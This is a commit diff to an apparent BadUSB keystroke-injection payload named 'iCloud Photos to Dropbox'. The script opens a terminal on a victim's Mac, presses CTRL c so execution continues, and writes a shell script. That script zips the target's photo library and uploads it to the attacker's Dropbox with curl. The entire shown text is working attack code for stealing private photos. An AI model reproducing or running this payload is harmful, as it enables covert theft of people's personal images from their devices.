Added CTRL c to guarantee the execution continues in the terminal iCloud Photos to Dropbox.txt
This commit is contained in:
@@ -46,6 +46,8 @@ DELAY 500
|
||||
STRING terminal
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 500
|
||||
CTRL c
|
||||
DELAY 1000
|
||||
STRING echo 'cd ~/Desktop && zip -r targets_photos.zip Libraries && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer <YOUR API KEY HERE>" -H "Dropbox-API-Arg: {\"path\": \"/targets_photos.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @targets_photos.zip' > upload.sh
|
||||
DELAY 1000
|
||||
|
||||
Reference in New Issue
Block a user